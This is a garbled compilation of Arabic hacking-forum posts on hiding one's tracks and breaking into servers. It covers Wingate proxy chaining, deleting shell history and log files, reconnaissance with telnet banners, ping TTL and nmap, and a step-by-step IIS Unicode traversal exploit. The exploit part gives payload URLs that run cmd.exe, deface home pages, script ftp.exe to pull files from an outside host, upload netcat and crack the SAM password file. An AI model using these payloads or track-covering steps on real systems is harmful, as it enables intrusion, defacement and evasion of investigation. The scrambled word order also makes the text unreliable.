هذا مثل جيت بالوين تتصل سوف كذا  بعد

Wingate< 203.207.173.166 23 

يعني العنوان تغيير مع ولكن مرة من اكثر العملية تكرر تقدر بعدينكذا

Wingate< 213.17.99.45 23

أخرى مرة اتصل  وأيضا

Wingate< 10.65.212.7 23

من بأكثر ماتتصل بعد بالموقع wingate ألحين  اتصل

WinGate<arbornet.org 

كذلك تبدو سريعة وبخطوة الطريقة اذا

C:\Windows< telnet 61.133.119.130 23 

Wingate<203.207.173.166 23 

Wingate<135.245.18.167 23 

Wingate<m-net.arbornet.org Connecting to host arbornet.org...Connected

،،،انتهى

" الـ ملفات األثارمن وإزالة الخصوصية حماية "Logsبين> اإلسالمية الحزم منتديات من >منقول

> الظامي: حزم >الكاتب

يونكس سيرفرات مع االثر تعقب ومنع التخفي بموضوع يتعلق فيماتمنحه . التي خواصيونكس أهم من أن تعلم أن البد أوال لينوكس أو

المستخدمين . تعدد على تقوم Unix Multi-User Mode . القوةOperation . أن تعلم أن بد ال ) Linux ( ثم من المجاني االصدار هو

يونيكس ستتعامل . ) Unix ( نظام يونيكسفحتما فهم األفضل يعنيمع تتعامل كونك ارتياح لينوكسبكل Unix مع

رئيسين لقسمين الموضوع أقسم أريد : أوالساعات تكفي ما الموضوع الن بعجاله منهما واحد كل عن ساتكلم

يفنى . ادم ابن عمر ان اتوقع والله بل عنه شيء كل لكتابة معدودةما كل مستواه تقدم ما وكل االنترنت على االمن عن يبحث وهو

التخفي اجل من به يقوم ان يجب وما حوله ما كل تماما يعي اصبحاالثر تعقب  .... ومنع

اجراءاتك : فيه يسجل التي النظام يخصملفات األول ... القسم) LOG File ( 

يقفعن : ... وهذا خصوصياتك وحماية باتصالك يتعلق الثاني القسمشخصفينا كل .... قدرات

، عنك المعلومات تجمع انترنت في االجهزة جميع الواقع فيال عنوان مثل رقم IP ابسطها و اسمك مثل حساسية اكثرها و

جهاز ........ و ملفاتك البريدي عنوانك و ربما الخاصبك الهاتفبواسطة بانترنت ارتبط لو للغاية جيدة بصورة محمي كومبيوترك

حتى ولكن اضافية، برمجيات استخدام بدون و فقط التشغيل نظامالجهاز سيفقد االولى القليلة االسابيع غضون ففي ذلك حصل ولو

تتابع النترنت سليم الغير لالستخدام نتيجة حمايته اجزاء من الكثيرالثغراتفي يتابع الكل بشدة، التشغيل نظم Microsoft الشركات

Windows و Linux و Mac الى الوصول الصعب من لذلك ، غيرهما ورسمي تدخل بدون و فورية بصورة االجهزة .... تلك

ان الله واسال المجال لهذا طريقي بداية في الزلت انا والحقيقةفضله من علينا ويفتح .. يسهل

اجراءاتك : فيه يسجل التي النظام يخصملفات األول ... القسمتسمى الجراءاتك التسجيل بملفات يتعلق مؤرخه . ) LOG File ( ما

واإلجراء . بالوقتاألداء ملفاتسجل تسمى كما االحداث سجل وتسمى

الويب مزودات جميع عن )Web servers( تسجل واسعة معلوماتاألداء ملفاتسجل ضمن موقعك، إلى الوصول ،)log files( حركة

الكمبيوتر نشاطات تلتقط نصوصبسيطة ملفات عن عبارة وهيكان. ما وهذا يدويا، األداء معلوماتسجل تحليل ويمكن المزود

. ملفسجل حجم زاد إذا لكن ويب شبكة بدايات في الناس، يفعلهغير )log file( األداء يصبح اليدوي التحليل فإن بايتات، كيلو بضعة عن

. مزودات أن االعتبار بعين أخذت وإذا كليا مستحيال يكن لم إن عملي،كثيرة، ميجابايتات إلى حجمها يصل األداء، لسجل ملفات تولد اليوم

ألدركت أكثر، أو جيجابايت إلى األحيان من كثير في ويصل بل إطالقا وارد غير اليدوي التحليل أن .ببساطة

األداء ملفاتسجلعلى األداء، ملفاتسجل تحتوي تستخدمه، الذي الويب لمزود تبعا

- بها- يقوم زيارة لكل التالية، المعلومات جميع المحتمل ومن بعضموقعك إلى :زائر

كل تراقب وهي لها الووصول يمكنك ال ملفات ثمة ان أخبرك وأريدقدرات ... حسب الخر نظام من األمنية االجراءات وتختلف اجراءاتك

عليه تعمل الذي النظام ... مدير

 :اقتباس________________________________________

نظام في الملفات هذه عن هيكستكلم أخوي . WIN NT عمومالدرسه الرجوع ويمكن فايل اللوق إزالة يتم  ... وكيف

________________________________________

كلشي تزيل ان يشترط وال اهمها عن اخبرك راح االن : واناجله ( يترك ال كله يدرك ال تستطع ) ) فما لم إذا تحبط ال حتى ودائما

تستطيع ( ما إلى وجاوزه فدعه شيئااستخدام ... هي يونكس انظمة مع للتعامل المثلى الطريقه عموما

قدرات من ذهول اعيشفي االن إلى فأنا رأيي وهذا النصي الشلاالمكانيات ... الدوسصاحب ان يكفي العجوز النظام هذا

أداة .. أو جزء األصل في هو واالستجابه التنفيذ وسرعة والسهولةواال تطويرها على مايكروسوفت يونيكسوعملت أدوات من

ادنيشك يونكسبال هو ... فاالصلالشل تستخدم ما كل تحذفها أريدك حاليا الملفات أهم عموما

كالتالي . هي : النصي.lastlogin

يبدا مجلد أو ملف فاي ملفمخفي انه يعني مما بنقطه بدايتهيوينيكس في مباشرة مخفي هو اذا . بنقطه

الدخول سجل ايبي اخر به يسجل الملف . وهذا

.bash_historyنفذتها التي األوامر جميع تسجل راح  هنا

.contactemailالبريد مع للتعامل النصي الشل تستخدم كنت ما  اذا

المجلدين هذين حذف منك أريد  أيضاTmp واالخر .trash مجلد معهم تنسف حبذا . etc ويا

البعض يعرفها ربما مشكلة . هناملفي حذفت كوني lastlogin & .bash_history. هو

االمر ملف rm باستخدام تجدد االجراء هذا ناتج يكون راح تلقائياbash_history. الباش

محتواه : ليصبحrm .bash_historyrm .bash_history

ملف ناتج يكون مره lastlogin. وراح اخر به دخلت الذي االيبي . هوتظهر الحذف أوامر نريد وما نهائيا ننسفها الحل وش  .... طيب

تستخدم هناك . cpanel الطريقة أخون يا وللعلم إجراء أفضل هوواالبتكار التجديد ومن االبداع من اليونكستمكنك في جباره اعدادت

..

بااليبي كامل بالنظام اللعب يمكنك حتى للعلم أخواني عموماالموضوع localhost : المحلي هذا عن تكلمنا العمر في الله مد واذا

الله ... باذن

وبنفس : مشفوتوشوب بانل سي من وهي الصورة هذه الحظالحقيقي المصدر عن معلومات اي بال السيرفر في تتحكم الطريقة

.... لالتصال

من اعمل اني والله بالعمر الله مد اذا الموضوع لهذا سأعود عمومايونيكس الحتراف عملي وتطبيق دروسنظرية كتابة على ... اشهر

يكن لم وإن حتى وحذفها اللوق ملفات عن الحديث نكمل وراحالحذف ... تستطيع فوالله بملكيات لك ... مسموح

االخر للجزء ... ننتقليقفعن : ... وهذا خصوصياتك وحماية باتصالك يتعلق الثاني القسم

شخصفينا كل .... قدرات

البروكسي نفس إما يستخدم منا األغلب أن المشكلة الحقيقة أخوياشتغل .. .. الله سهل وان يستخدمه اللي الخدمه لمستضيف

التصفح بروتوكوالت مع يعمل أن ) HTTP Protocol( ببروكسي ويجبالشبيهه االخرى االنظمة يونيكسأو نظام مع تتعامل حين أنك ندرك

ال فهذا للتصفح المعتاده البروكسيات تستخدم كونك ان والحقيقةبروتوكوالت استخدمت اذا هويتك األمثل .... HTTP يخفي الحل ولكن

السوكس بروكسيات تستخدم عليك . SOCKS Protocol أنك فيجبالحاجة عند أو لخصوصيتك حماية سوكسالستخدامها ارقام إيجاد

النظام على عملك اناء . للتخفيأنواع ثالثة مجملها في البروكسيات . عموما

1( Web Proxy Service للتصفح . HTTP Protocol . وهذا2( WinSock Proxy Service سيرفرات مع مفيد windows NT وهذا

بروتوكوالت على العمل عند هويتك اخفاء على عملها في ويفيدtelnet أو FTP البروتوكول هو ...... WinSock Protocol وهذا

3( Socks Proxy Service . في منه ويستفاد األقوى )SSL( وهذاSecure Sockets Layers إلى IIS( Internet Information( باالضافة

Server مع ، FTP وكذلك Windows NT ويخدم Telnet ، Gopher،IRC ، RealAudio ، POP3 كونه بين يجمع النوع إلى firewall وهذا إضافة

أمنية موارد ... securiy . خدمة معلومات تغيير في وظيفته وتكمنبروتوكول ..... فيها يستخدم ما وعادة بها تتصل التي االنترنت خدمة

TCP/IP لالتصال وسيلتين البروتوكول هذا : ويستخدمالعالمية * المنظمة Internationa Organization for( طريقة

Standardization(األمريكية . ** الدفاع وزارة وضعتها لالتصاالت بروتوكوالت . مجموعة

ransmission Control Protocol TC ... كثيرا تساعدك برامج ثمة أن وهو جدا هام أمر هناك أخواني الحقيقة

ال التي الرقابة تقنيات من التخفي في تساعدك المحترفة بتقنياتها ... جدا كثر وهي نظام منها : يخلوا

Ping ، Traceroute, DNS lookup, Finger, Whois, LDAP, SNMP وهذا يستخدمه الذي االتصال بروتوكول واعتبار النظام باعتبار يكون

وتوكول ... WIN NT : نظام من النظام TCP/IP ويستفيد ... لمراقبةنظام مراقبة يتم الرواتر UNIX وبالمقابل طريق وهو Router . عن

أو الموجه أي المصطلح بهذا ونعني النظام لتشخيص فعاله أداةأجزاء من جزء كل على التعرف على بقدرته الراوتر ويتميز الموزع

ويسمح البيانات سير وموازنة األداء مراقبة عى ويعمل الشبكةومواصفاتها ... استقالليتها على بالحفاظ المتصلة للشبكات

الخاصة . وعناوينهاالموزعات أو للموجهات نوعين إستاتيكي : . ) Router( وهنا األول

يدوي ضبط الشبكة مدير من . يتطلبباالمان النوع هذا . ويتميز

ضبط .... ... الى ويحتاج اتوماتيكيا بأعماله يقوم ديناميكي والثانياألول من أمانا أقل وهو . بسيط

إخواني . عموما الموضوع هذا في تفرعت ربما اسف انا عموماتزوير ... أو إخفاء أو بتشفير عليكم لكم أقول أنا لالتصال بالنسبةهذه ... . بمراقبة وعليكم بدون أو ببرامج طريقة باي بياناتكم

: البورتات

http://www.analogx.com/files/proxyi.exe

اسمه آخر برنامج PortBlocker : ويدعمهنقلك أو تصفحك في تستخدمه التي البورتات حماية في يساهم

وتسجيل تحركاتك مراقبة في تستخدم ان من غيرهما أو للملفات: معلوماتك

PortBlocker is configured to block the most common types of servers that might be on a system )FTP, HTTP, etc(, so will not require any modification for most users. If you are running a

special server of some sort, then you can easily add it's ports )either TCP or UDP( to it's list, and have them blocked and/or

logged.Log unauthorized port access attempts and secure internal

servers from internet access easily...

برنامج هنا من PortBlocker حملhttp://www.analogx.com/files/pblocki.exe

الذي وهو المميز البرنامج بهذا ذكرني الذي الله أحمد والحقيقةعلى عملك أناء لمراقبتك سجلت التي المعلومات كل لك يوضح

. نظامكالتجسسي بطبعها معروفة مايكروسوفت أن تعلمون كلكم بالطبع

...وال عنكم تسجيله تم ما كل تعرفوا لكي البرنامج هذا لكم فأقدم

المعلومات ... من الهائل الكم ان متأكد الني دعوة من تنسونيأن لها آن ولكن وخفية منتظمة غيرك وعن عنك والتقارير المرسلة

... تفضحالبرنامج Proxy Log Analyzer : اسم

1.07للتحميل : MB ضغط بدونhttp://www.mechanicalminds.com/software/pla/setup.exe

ZIP archive instructions 818 kb http://www.mechanicalminds.com/software/pla/pla.zip

تحب كما البيانات بتعبئة لك يسمح المتصفح أن عن . ناهيكProvides a space for you to type the address and port number of the proxy server you want to use to gain access to the Internet

over HTTP, Secure, FTP, Gopher, and Socks protocols.لالتصال المتقدمة االعدادت استخدام : فقط

أي حصول بال ملفاتك كل ترسل بامكانك بالماسنجر االيبي حتىلك الحقيقي االيبي على . انسان

خذ ... ادوات قائمة من الماسنجر افتح اذهب سهله والطريقة. خيارات

،،،انتهىمتخفيا HTTP Port برنامج" النت تتصفح يجعلك "!!الذي

> دوس نجم منتدى من >منقول> المدمر: >الكاتب

البرنامج :اسم------------------------

HTTPort 3snf------------------------

:الوظيفة------------------------وأمان بسرية لتصفح برنامج

األنترنت في

الرقمية البروكسيات من ويريحك

عنها البحث ومن

,,,,,,,,,,,,------------------------

التحميل وصلة------------------------

http://www.angelfire.com/tv2/ssdd63/httport3snf.zip------------------------

شبكة " أو موقع عن المعلومات بجمع القيام " كيفية

> إعصار منتدى من >منقول> المدمر: >الكاتب

كانت أيا شبكة أو سيرفر أو موقع ألي المعلومات جمع : طرق

=) األولى =)الطريقة^^^^^^^^^^^^^^^^^^^

موقع زيارة خالل من  وهيhttp://www.netcraft.com/ 

كثير تفيدك معلومات يعرضلك وراح هناك الموقع وتكتب^^^^^^^^^^^^^^^^^^^

=) الثانية =)الطريقة^^^^^^^^^^^^^^^^^^^

ولنفرض عملها مدى الادري لكني حديثا تستخدم قديمة وهيهو عنه معلومات نجيب نبي الي الموقع

http://www.almodammer.com/مثل موجود وغير وهمي إليميل رسالة بإرسال نقوم

dfl;kjgk'dgjbumpipt@almodammer.comتعرض ولما رد تستقبل راح وهمي إليميل رسالة ارسال وبعد

الموقع Headersالـ عن معلومات تالقي راح بالرسالة الخاص^^^^^^^^^^^^^^^^^^^

=) الثالثة =)الطريقة^^^^^^^^^^^^^^^^^^^

Bannersالـالبانر؟ ماهو

ما أمر تنفذ عندما تأتيك التي الرسائل هي شديد وباختصار البانرالرد ..يعني

الموقع؟ معلومات كشف في نستغلها راح وكيفأداة طريقة تقوم Telnet Client عن أن هي والطريقة التلنت عميل

كان سواء المنافذ بأحد  باالتصالFTP 21أو

TELNET 23^^^^^^^^^^^^^^^^^^^

=) الرابعة =)الطريقة^^^^^^^^^^^^^^^^^^^

HTTP وهيHyper Text Transfer Protocol

المنفذ على 8080 - 80ويعملالمنفذ على نتصل طريق 80ألحين عن Telnet األمر نكتب وبعدين

التاليGET /qwe HTTP/1.1

الخطأ صفحات بوجود البانر يخبرنا راح كذا 400بعدالهدف عن هائلة معلومات تجيك وراح

وهو ثاني امر عندك :وفيهHEAD 127.0.0.1 HTTP/1.1

بتنفيذه ... تقوم^^^^^^^^^^^^^^^^^^^

=) الخامسة =)الطريقة^^^^^^^^^^^^^^^^^^^

أمر من للـ ping وهي طلبات عدة بإرسال يقوم للموقع ipالذي أوهائلة وبسرعة الردود باستقبال  ويقوم

للموقع معلومات تحديد في منها نستفيد كيف ! الحينالتالي بوضع تقوم حيثping ipsite

ipsite= بالموقع الخاص بي  اآليكلمة اال مايهمنا حنا اسطر عدة يطلعلك وراح

TTL=XXXXXX= طلعلك الي والعدد القيمة

التشغيل نظام تحديد يمكن خالله من أقولك وشفايدته بتقوليامثلة :وهذي

Windows 9x/NT Intel 32 Windows 9x/NT Intel 128 Windows 2000 Intel 128 DigitalUnix 4.0 Alpha 60 

Unisys x Main***** 64 Linux 2.2.x Intel 64 

FTX)UNIX( 3.3 STRATUS 64 SCO R5 Compaq 64 

Netware 4.11 Intel 128 AIX 4.3.x IBM/RS6000 60 AIX 4.2.x IBM/RS6000 60 

Cisco 11.2 7507 60 Cisco 12.0 2514 255 

IRIX 6.x SGI 60 FreeBSD 3.x Intel 64 OpenBSD 2.x Intel 64 Solaris 8 Intel/Spar 64 

Solaris 2.x Intel/Sparc 255واحد يساوي الفرق يكون حيث القيم في اختالف يحدث  وقد

مرور: عند ( data list or packet أي بيانات قائمة او Nodesبـ )حزمأن بـ TTL حيث 1تنقص

أمر تستعمل ان عليك أما tracert لذلك الويندوز فهو traceroute فيباليونكس خاص

الموقع أو الشخص عن بعرضمعلومات خاص امر  وهوالطريقة بهذه استخدامه ويمكننا

tracert ipip= السخص أو الموقع  عنوان

^^^^^^^^^^^^^^^^^^^

=) السادسة =)الطريقة^^^^^^^^^^^^^^^^^^^

والبرامج األدوات طريقة عناألسهل Windows أوال  ألنه

المفتوحة المنافذ او والسيرفر الموقع عن معلومات تحديد يمكنكمن بكثير المنافذ استغالل ويمكنك برنامج اي تطبيق قبل من

الثاني الدرس في لها نطرق وسوف االختراق عمليات

برنامج كل مو ان تعرفون لكن برامج مليان الويندوز ان تعرفوناالفضل اذكر راح كذا عشان برنامج أي : مثل

N-Stealth ) الخ ... ثغرات المنفذ منها الشبكة عن معلومات )لتحديد=============

Shadow Sceurity Scanner ( المنافذ عن البحث برامج أفضل منلكيفية شرح وجود مع الثغرات ومعظم والعمليات والتطبيقات

)عالجها=============

SuperScan ( المواقع الختراق استخدمه فأنا المفضل برنامجيبالموقع المفتوح المنافذ معرفة في كثيرا يساعدني حيث واألجهزة

على ويحتوي شئت List واألجهزة كيفما عليها اإلضافة يمنك )كبيرة-------------------------------------------------------------------------

على نجي Linux الحينبجدارته ليونكسيشهدون مستخدمين وأكثر مفضل واحد برنامج هو

اسم يحمل والذيNmap

لـ ( Network Maperاختصار الشبكات )مستكشفدائما كذا علشان ويندوز وطرق ويندوز ادوات كل يفوق وطبعا

بـ باختراق Linuxينصح للمتهمين خاص وهو/ السيرفرات/ المواقع الشبكات

استمعاله : كيفيةمثل nmap شغل ظهرت الذي األوامر من الكثير تجد /وراح[l] Nmap V. 3.00 Usage: nmap [Scan Type)s(] [Options] 

Some Common Scan Types )'*' options require root privileges(* -sS TCP SYN stealth port scan )default if privileged )root((-sT TCP connect)( port scan )default for unprivileged users(

* -sU UDP port scan-sP ping scan )Find any reachable machines(

* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan )experts only(-sR/-I RPC/Identd scan )use with other scan types(

Some Common Options )none are required, most can be combined(:

* -O Use TCP/IP fingerprinting to guess remote operating system-p ports to scan. Example range: '1-1024,1080,6666,31337'

-F Only scans ports listed in nmap-services-v Verbose. Its use is recommended. Use twice for greater effect.

-P0 Don't ping hosts )needed to scan http://www.microsoft.com/ and others(

* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys-T General timing policy

-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]

-oN/-oX/-oG Output normal/XML/grepable scan logs to -iL Get targets from file; Use '-' for stdin

* -S /-e Specify source address or network interface--interactive Go into interactive mode )then press h for help(Example: nmap -v -sS -O http://www.my.com/ 192.168.0.0/16

'192.88-90.*.*'SEE THE MAN PAGE FOR MANY MORE OPTIONS,

DESCRIPTIONS, AND EXAMPLES

المجهولة االوامر من العديد يحتوي !!!!!!!!! وأيضاإلى بالذهاب قم اكثر ومعلومات الخاص man page ولخلفية

..بالبرنامجوهو أمر أهم  لنشرح

nmap -sS -O -vv almodammer.comalmodammer.com= فحصه المراد الموقع

وأدوات برامج معلومات تفوق هائلة معلومات يعرضلك وراحويندوز

والسيرفر والملقم واإلصدار المنافذ ....... منها^^^^^^^^^^^^^^^^^^^

=( السابعة =)الطريقة^^^^^^^^^^^^^^^^^^^

جهازك وجود على تطبق Shell Account أو Linux تعتمد تقدر حتىتركب لو لكن الويندوز اليونكسفي ألن Linux اوامر Shell أفضلوركب نفسك التتعب كذا علشان مناسب وسعره ممتاز يكون الزم

Linux وارتاحأمر هذا  whois المهم

لنا يوفره دقيقة Linux والي وغير وثقيلة كبيرة كبرامج  والويندوزاألمر اضف أكثر ولمعلومات

man whois -------------------------------------------------------------------

البحثفي فيمكنك الويندوز طريق عن google أماhttp://www.google.com/search?q=whois&btnG=Google+Searchو سكربتات وهي الخدمة هذي تقدم المواقع من تقوم cgi والكثير

بسيط اختالف مع ذكرتها التي الطرق بإحدى الموقع عن بالبحثبموقع شبيهة األولى netcraft وهي ..............الطريقة

16." ) األول ) الجزء اليونيكود طريق عن " اإلختراق>منقول<

>sNiper_hEx :الكاتب<على ) الدرساالول يلي ( 13يحتوى كما وهي نقطة :-

باليونيكود - . تعريفالثغرة - هذه ظهور . تاريخ

الثغرات - هذه ايجاد . كيفيةاليونكود - ثغرات استغالل يتم . كيف

ملف - بواسطة المستخدمة . CMD االوامرالثغرات - هذه تطبيق . طريقة

الـ - امر تفعيل من تتمكن حتى اليونيكود ثغرة اختصار . ECHO كيفيةالـ - ملف نسخ الملفات CMD طريقة على الكتابة امكانية . التاحةالـ - مشكلة معرفة لها Access Denied كيفية المتبعة . والحلول

الـ - بواسطة للدخول اكاونت عمل . FTPكيفيةاالدمينستريتور - باسورد كشف . طريقة

برنامج - بواسطة لوود االب وعملية للموقع الرئيسية الصفحة تغييرTFTP .

عليك - التعرف يتم ال حتى اللوق ملفات . مسح

باليونيكود - . تعريفخدمة مجموعة في الثغرات من مجموعة عن عبارة اليونيكود

مع ركبت التي مع IIS4.0 / IIS5.0 المعلومات عادة ياتي / NT4 والذيWin2k .

الثغرة - هذه ظهور . تاريخظهورها يعتبر لذا لليونيكود ثغرة اول لظهور محدد تاريخ اليوجد

شخصمجهول ، anonymous person بواسطة ظهور اول ان وقيلمايثبتصحة اليوجد ولكن الصينين بواسطة كانت اليونيكود لثغرات

قبل من الثغرات هذه استغالل فتم ، الثغرات لهذه الكالم هذالها الالزمة البرامج وتطوير . المخترقين

الثغرات - هذه ايجاد . كيفيةبطريقتين الثغرات هذه ايجاد -: يتم

سواء -1 الثغرات هذه لكشف والمخصصة الالزمة البرامج بواسطةتعمل والتي الشل بطريقة او ويندوز نظام على تعمل التي بالبرامج

لينكس نظام . علىمباشرة -2 الموقع على الثغرة تطبيق . بواسطة

اليونكود - ثغرات استغالل يتم . كيفالـ نظام على الثغرة تطبيق ملف IIS4 / IIS5 عند CMD يبدا شفرة بفك

استغاللها يتم هنا ومن الخطاء المثال في . اليونكود

ملف - بواسطة المستخدمة . CMD االوامرالـ ملف بواسطة المستخدمه دليل CMDاالوامر النشاء امر وهي

وامر الحذف وامر النقل وامر النسخ وامر دليل اللغاء وامر جديدداخل الكتابة وامر الملف محتويات لرؤية وامر الملفات اسماء تغيير

التالية االمثلة وهيحسب ، ملف أي لسحب وامر ملف -: أيدليل انشاء امر

 http://www.xxxx.com/msadc/..%c0%af.....e?/c+md+c:\hEx :جديد

الغاء امر http://www.xxxx.com/msadc/..%c0%af.....e?/c+rd+c:\hEx :دليل

الملفات: من تمام فارغا كان اذا اال دليل أي الغاء اليمكن للمعلوميةوالمجلدات

للنسخ المستخدم :االمرhttp://www.xxxx.com/msadc/..%c0%af.....cripts\hEx.exe

للنقل المستخدم :االمرhttp://www.xxxx.com/msadc/..%c0%af.....ts\hEx.exe+c:\

للحذف المستخدم ../http://www.xxxx.com/msadc :االمر%c0%af.....del+c:\hEx.mdb 

مسمى لتغيير المستخدم االمر../http://www.xxxx.com/msadc :الملفات

%c0%af.....ex.htm+hEx.htm

محتويات لرؤية المستخدم االمرhttp://www.xxxx.com/msadc/..%c0%af.....ype+c:\hEx.txt :الملف

ملف أي داخل للكتابة المستخدم :االمرhttp://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/

c+echo+sNiper_hEx+<c:\hEx.txt

ملف أي سحب لعملية المستخدم :االمريتم وبعدها دليل أي الى سحبه المراد الملف بنسخ اوال القيام عليك

كالتالي العنوان اخر الملففي اسم :كتابةhttp://www.xxxx.com/msadc/hEx.mdb

الثغرات - هذه تطبيق . طريقةاالمثلة حسب تتم المتصفح خالل من الموقع على الثغرة تطبيق

-: التاليةhttp://www.xxxx.com/scripts/..%c1%1c...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c0%9v...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c0%af...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c0%qf...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c1%8s...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c1%9c...exe?/c+dir+c:\

http://www.xxxx.com/scripts/..%c1%pc...cmd.exe?/c+dir +c:\يكون بحيث الدليل مسمى تغيير الى نحتاج -: وقد

Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin 

الـ - امر تفعيل من تتمكن حتى اليونيكود ثغرة اختصار . ECHO كيفيةانه ولنفترض اليونيكود مشكلة من يعاني موقع اكتشاف حالة في

الثغرة هذه على -: كانhttp://www.xxxx.com/msadc/..%c0%af.....exe?/c+dir+c:\

ملف نسخ الى مجلد w3svc.exe فنحتاج واالمر inetpub\scripts الىالطريقة بهذه -: يكون

http://www.xxxx.com/msadc/..%c0%af.....ipts\w3svc.exe

ملف نسخ مجلد w3svc.exe بعد ، inetpub\scripts الى نقوم االنالطريقة بهذه الثغرة خالل من الموقع -: بتصفح

http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\الرئيسي الملف وبالتحديد ملف أي داخل الكتابة نستطيع االن

الدليل هذا في مايكون غالبا الذي  للموقعinetpub\wwwroot\index.htm التالي بالشكل االمر يكون -: بحيث

http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.com+<+c :\inetpub\wwwroot\index.htm

الـ - ملف نسخ الملفات CMDطريقة على الكتابة امكانية . التاحةالـ ملف نسخ داخل CMDالغرضمن للكتابة امكانية العطاء وهو

بهذه السيكربت مجلد الى نسخه ويتم الحاالت بعض في السيرفر-: الطريقة

http://www.xxxx.com/msadc/..%c0%af.....ripts\cmd1.exeالـ ملف استخدام بامكاننا االول CMDاالن من بدال الثغرة في الجديد

الشكل -: بهذاhttp://www.xxxx.com/msadc/..%c0%af......exe?c+dir+c:\

الـ - مشكلة معرفة لها Access Denied كيفية المتبعة . والحلولالـ مشكلة معرفة حذف Access Deniedتتم في المحاولة خالل من

الـ رسالة ظهور فعند ، امتداد أي ملفمن فاليك Access Denied أيعلى اكثر والتحكم الملفات على الكتابة من تتمكن حتى الطرق هذه

-: السيرفرالـ -1 ملف نسخ االولى بمسمى CMD الطريقة السيكربت دليل الى

CMD1 االمر باستخدام الكتابة امكانية لك يتاح Copy فسوفاالمر هذا -: باستخدام

http://www.xxxx.com/msadc/..%c0%af.....ripts\cmd1.exeالملف -2 مع بالتعامل الثانية يلي ssinc.dll الطريقة كما -: والطريقة

o باسم صفحة انشاء test.shtml اوالo مجلد داخل الصفحة هذه wwwroot/hEx/test.shtml تكون

o الصفحة داخل الكود هذا >--"include file="AAAA[...]AA#--!< كتابةحرف ان يتعدى A بحيث حتى كتابتة حرف 2049يتم .

o خالل من الصفحة طلب يتم االنhttp://www.xxxx.com/test.shtml المتصفح

o الصفحة لك تظهر سوف . االنo الـ مشكلة تخطي وتم الكتابه تستطيع . Access Deniedاالن

o رقم الخطاء صفحة لك ظهرت بتطبيق 500اذا تقم لم انك فمعناها المحاولة اعادة وعليك الصحيح بالشكل . الطريقة

برنامج -3 باستخدام الثالثة لوود NC.exe الطريقة اب عمل يتم بحيثالـ مجلد داخل الملف تنفيذ Tempلهذا يتم ومنه الويندوز دليل في

الـ مجلد وللمعلومية الدوز موجة خالل من مفتوح Tempاالوامرلوود االب . لعمليات

باستخدام -4 كراشللسيرفر عمل خالل من وهي الرابعة الطريقةمن كثير في مجديه غير الطريقة الغرضوهذه لهذا الالزمة البرامج

. االحيانملفات -5 عن ، root.exe : البحث sensepost.exe ، shell.exe ،

w3svc.exe مجلد الى من c:\inetpub\scripts ونسخها الثغرة وتطبيق. خاللها

الـ - بواسطة للدخول اكاونت عمل . FTPكيفيةملف -1 مجلد CMD نسخ يتم Shell.exe باسم Scripts الى حتى

قديمة ثغرة من  االستفادة/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\script s\shell.exeملف -2 االمر mspft.pll انشاء التالي Echo بواسطة فيه open وكتابة

ftp.host.com للـ الخادم هو هذا ان . FTPحيث/c+echo+open+ftp.host.com+<+c:\winnt\mspft.ppl

مجهول -3 اضافة مطلوب الذي Anonymous االن نفسالملف الىبانشاءه  mspft.pll قمنا

/shell.exe?/c+echo+anonymous+<<+c:\winnt\mspft.ppl

البريد -4 ادراج مطلوب  hExRay@Hotmail.Com االن نفس الىبانشاءه قمنا الذي  mspft.pll الملف

/shell.exe?/c+echo+hEx@Hotmail.Com+<<+c:\winnt\mspft.pplبانشاءه Anonymous قبل User إضافة -5 قمنا الذي الملف لزوم

mspft.pll /shell.exe?/c+echo+user+anonymous+<<+c:\winnt\mspft.ppl

االعداد -6 لحاجة تكرار  االن/shell.exe?/c+echo+hEx@Hotmail.Com+<<+c:\winnt\mspft.ppl

للملفات -7 الحالي الموقع ادراج هنا  يتم/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+<<+c:\winnt\mspft.pp

lالـ -8 اوامر يكتب الـ FTPاالن خادم الملفمن لسحب FTPالالزمة

السابق Get index.htm وهي المسج بدون هنا يدرج  ثم/shell.exe?/c+echo+get+index.html+<<+c:\winnt\mspft.ppl

باضافة -9 ولكن نفسالسابق Quit هنا/shell.exe?/c+echo+quit+<<+c:\winnt\mspft.ppl

امر -10 تنفيذ يتم عبارة ”FTP.exe?+"-s:c:winnt\mspft.ppl االن وهوملف في وموجودة بانشاءها قمنا خطوات باحتوائها mspft.ppl عن

مايلي -: على- Open FTP.host.com

- Anonymous- hEx@Hotmail.Com- User Anonymous

- hEx@Hotmail.Com- Get index.html

- Quit

/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"

االدمينستريتور - باسورد كشف . طريقةبرنامجين وجود الى وهي ) Microsoft Access – L0phtCrack ( نحتاج

وهي لتالية الخطوات بعض تنفيذ -: لزومالـ - ملف في موجود يكون للسيرفر االدمينستيتور _.SAM باسورد

دليل هو \winnt\repair\ في الباسورد شفرة لفك برنامج وافضل L0phtCrack برنامج

فان - حساب لديهم ويوجد السيرفر في مستخدمين هناك كان اذاملف في تكون سوف تحديد PASSFILT.DLL معلوماتهم ونستطيع

المفتاح هذا بواسطة الريجستري خالل الملفمن هذا -: مسارHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\

Lsa\SYSTEM32\PASSFILT.DLL

الـ - صفحات باستخدام القراءة في يعتمد السيرفر كان ASP اذاالـ قاعدة خالل من البيانات الى الى MySQL للوصول نحتاج فسوف

ثغرة هذة ) htr.+ ( تطبيق عن المسئول باسورد الى للوصولكالتالي وهي -: القاعده

http://www.xxxx.com/default.asp+.htr

المطلوبة الصفحة الى الوصول في الخطا صفحة ظهور عند

فقط وماعلينا صحيحة فالطريقة التنفيذ سيكربت في وبالتحديدملف سحب اسم database.inc سوى على للعثور محتوياته وقراءة

البيانات قاعدة عن للمسئول والباسورد . المستخدم

برنامج - بواسطة لوود االب وعملية للموقع الرئيسية الصفحة تغييرTFTP .

